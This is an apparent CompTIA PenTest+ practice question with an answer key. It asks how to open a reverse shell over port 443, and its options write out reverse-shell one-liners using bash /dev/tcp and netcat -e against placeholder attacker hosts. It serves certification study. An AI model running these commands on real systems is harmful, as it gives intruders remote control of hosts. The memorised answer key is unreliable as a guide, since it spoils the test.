CompTIA PenTest+ (PT0-001) — Question 17
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
Answer options
- A. `perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;`
- B. `ssh superadmin@<DESTINATIONIP> -p 443`
- C. `nc -e /bin/sh <SOURCEIP> 443`
- D. `bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1`
Correct answer: D
Explanation
The correct answer is D because it uses the bash shell's built-in `/dev/tcp` pseudo-device to open a TCP connection to the attacker's machine on port 443, redirecting an interactive shell's input and output over that connection; this is exactly the outbound traffic the scenario says is unrestricted. Option A is incorrect because it does not create a reverse shell; it only sets up a socket. Option B is not suitable for a reverse shell: it is an outbound SSH client connection, which requires authentication on the destination host. Option C uses netcat, but the `-e` option is not available in every netcat build, so it is less reliable across environments than the bash TCP method.